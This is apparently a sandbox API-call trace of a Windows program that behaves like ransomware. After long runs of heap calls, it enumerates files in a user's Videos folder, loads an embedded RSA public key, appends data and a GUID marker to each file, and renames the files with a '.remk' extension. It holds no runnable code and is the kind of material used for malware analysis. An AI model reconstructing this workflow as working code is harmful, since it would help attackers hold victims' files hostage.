[0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.670] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\") returned="CSFg h-wcbKcac\\" [0235.670] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\") returned="PCPKs0u\\" [0235.670] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0235.670] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.670] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.670] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.670] PathFindFileNameW (pszPath="") returned="" [0235.670] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806a4650, ftCreationTime.dwHighDateTime=0x1d5dde7, ftLastAccessTime.dwLowDateTime=0x6b18bf50, ftLastAccessTime.dwHighDateTime=0x1d5def7, ftLastWriteTime.dwLowDateTime=0x6b18bf50, ftLastWriteTime.dwHighDateTime=0x1d5def7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.674] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806a4650, ftCreationTime.dwHighDateTime=0x1d5dde7, ftLastAccessTime.dwLowDateTime=0x6b18bf50, ftLastAccessTime.dwHighDateTime=0x1d5def7, ftLastWriteTime.dwLowDateTime=0x6b18bf50, ftLastWriteTime.dwHighDateTime=0x1d5def7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.674] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ec38410, ftCreationTime.dwHighDateTime=0x1d5e7e6, ftLastAccessTime.dwLowDateTime=0x32784680, ftLastAccessTime.dwHighDateTime=0x1d5dafa, ftLastWriteTime.dwLowDateTime=0x32784680, ftLastWriteTime.dwHighDateTime=0x1d5dafa, nFileSizeHigh=0x0, nFileSizeLow=0x13ace, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="677G8npInpXtd35QrCL.mkv", cAlternateFileName="677G8N~1.MKV")) returned 1 [0235.674] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\677G8npInpXtd35QrCL.mkv") returned=".mkv" [0235.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\677G8npInpXtd35QrCL.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\677g8npinpxtd35qrcl.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.676] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=80590) returned 1 [0235.676] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.679] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13aa8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.679] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.680] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x13ace, lpOverlapped=0x0) returned 1 [0235.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.682] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695058) returned 1 [0235.683] CryptCreateHash (in: hProv=0x695058, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.683] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.683] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.683] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.683] GetLastError () returned 0x0 [0235.683] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.683] CryptReleaseContext (hProv=0x695058, dwFlags=0x0) returned 1 [0235.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.683] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.683] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.683] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.684] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0235.685] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13ace, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.685] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.685] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.685] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.685] CloseHandle (hObject=0x640) returned 1 [0235.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185ef0 [0235.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0235.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185ef0 | out: hHeap=0x630000) returned 1 [0235.688] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\677G8npInpXtd35QrCL.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\677g8npinpxtd35qrcl.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\677G8npInpXtd35QrCL.mkv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\677g8npinpxtd35qrcl.mkv.remk")) returned 1 [0235.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.689] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.690] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1ae3640, ftCreationTime.dwHighDateTime=0x1d5e0b9, ftLastAccessTime.dwLowDateTime=0xd78b7390, ftLastAccessTime.dwHighDateTime=0x1d5e1ad, ftLastWriteTime.dwLowDateTime=0xd78b7390, ftLastWriteTime.dwHighDateTime=0x1d5e1ad, nFileSizeHigh=0x0, nFileSizeLow=0x7902, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e0OK1KsDLkbK.swf", cAlternateFileName="E0OK1K~1.SWF")) returned 1 [0235.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0235.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.690] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\e0OK1KsDLkbK.swf") returned=".swf" [0235.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\e0OK1KsDLkbK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\e0ok1ksdlkbk.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.691] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=30978) returned 1 [0235.691] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.694] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x78dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.694] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: 